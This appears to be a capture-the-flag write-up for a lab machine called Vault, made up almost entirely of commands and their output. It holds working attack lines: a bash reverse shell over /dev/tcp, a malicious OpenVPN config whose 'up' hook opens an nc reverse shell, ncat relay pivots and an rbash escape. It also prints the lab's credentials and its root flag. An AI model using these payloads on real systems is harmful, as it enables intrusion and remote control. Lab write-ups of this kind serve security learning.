Vault
Port Scan
$ sudo nmap 10.129.189.113 -p- --min-rate=10000 -T4 -sCV
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a6:9d:0f:7d:73:75:bb:a8:94:0a:b7:e3:fe:1f:24:f4 (RSA)
| 256 2c:7c:34:eb:3a:eb:04:03:ac:48:28:54:09:74:3d:27 (ECDSA)
|_ 256 98:42:5f:ad:87:22:92:6d:72:e6:66:6c:82:c1:09:83 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Web APP
It shows Sparklays, so I tried it on the browser, and found this:
http://10.129.189.113/sparklays/admin.php
$ gobuster dir --url http://10.129.189.113/sparklays/ -w /usr/share/seclists/Discovery/Web-Content/common.txt
/.htpasswd (Status: 403) [Size: 308]
/.htaccess (Status: 403) [Size: 308]
/.hta (Status: 403) [Size: 303]
/admin.php (Status: 200) [Size: 615]
/design (Status: 301) [Size: 327] [--> http://10.129.189.113/sparklays/design/]
$ gobuster dir --url http://10.129.189.113/sparklays/design/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,php -t 50
/.html (Status: 403) [Size: 311]
/.php (Status: 403) [Size: 310]
/uploads (Status: 301) [Size: 335] [--> http://10.129.189.113/sparklays/design/uploads/]
/design.html (Status: 200) [Size: 72]
$ sqlmap -r login.req --random-agent --level=5 --risk=3 --batch --dbms mysql --dbs
http://10.129.189.113/sparklays/design/design.html
bash -c 'bash -i >& /dev/tcp/10.10.14.215/4445 0>&1'
in /home/dave/Desktop, I found several interesting files:
Dave
$ cat Servers
DNS + Configurator - 192.168.122.4
Firewall - 192.168.122.5
The Vault - x
$ ssh dave@10.129.189.113
Dav3therav3123
$ netstat -tunl
tcp 0 0 192.168.122.1:53 0.0.0.0:* LISTEN
$ nc -zv 192.168.122.1 80
Connection to 192.168.122.1 80 port [tcp/http] succeeded!
# DNS server
$ nc -zv 192.168.122.4 80
Connection to 192.168.122.4 80 port [tcp/http] succeeded!
$ wget http://192.168.122.4
# port forwarding
$ ssh -L 8081:192.168.122.4:80 dave@10.129.189.113
set proxy 127.0.0.1:8081
# malicious OpenVPN config file
remote 192.168.122.1
ifconfig 10.200.0.2 10.200.0.1
dev tun
script-security 2
up "/bin/bash -c 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.122.1 8181 >/tmp/f'"
nobind
click Test VPN, then we got a shell from the DNS server (192.168.122.4).
$ cat /home/dave/ssh
dave
dav3gerous567
# get root access on the DNS server
$ sudo su
$ cat /home/alex/.bash_history
.....
ping 192.168.5.2
su root
......
$ grep -r "192.168.5.2" /var/log
Binary file /var/log/auth.log matches
Binary file /var/log/btmp matches
$ grep -rHa "192.168.5.2" /var/log
............
/var/log/auth.log:Sep 2 15:07:51 DNS sudo: dave : TTY=pts/0 ; PWD=/home/dave ; USER=root ; COMMAND=/usr/bin/nmap 192.168.5.2 -Pn --source-port=4444 -f
/var/log/auth.log:Sep 2 15:10:20 DNS sudo: dave : TTY=pts/0 ; PWD=/home/dave ; USER=root ; COMMAND=/usr/bin/ncat -l 1234 --sh-exec ncat 192.168.5.2 987 -p 53
/var/log/auth.log:Sep 2 15:10:34 DNS sudo: dave : TTY=pts/0 ; PWD=/home/dave ; USER=root ; COMMAND=/usr/bin/ncat -l 3333 --sh-exec ncat 192.168.5.2 987 -p 53
...............
nmap 192.168.5.2 -Pn -f
nmap 192.168.5.2 -Pn -f --source-port=4444
$ /usr/bin/ncat -l 1234 --sh-exec "ncat 192.168.5.2 987 -p 53" &
$ ssh dave@localhost -p 1234
Escape rbash
$ /usr/bin/ncat -l 1234 --sh-exec "ncat 192.168.5.2 987 -p 53" &
$ ssh dave@localhost -p 1234 -t bash
# in dave's home folder, there is file called root.txt.gpg
$ gpg -d root.txt.gpg
gpg: encrypted with RSA key, ID D1EB1F03
gpg: decryption failed: secret key not available
Before we found a key in the ubuntu host (192.168.122.1), and the file called key in /home/dave/Desktop.
# on Vault
$ base32 -w0 root.txt.gpg
# on Ubuntu
$ echo QUBAYA6HPDD..... | base32 -d > a.gpg
$ gpg -d a.gpg
itscominghome
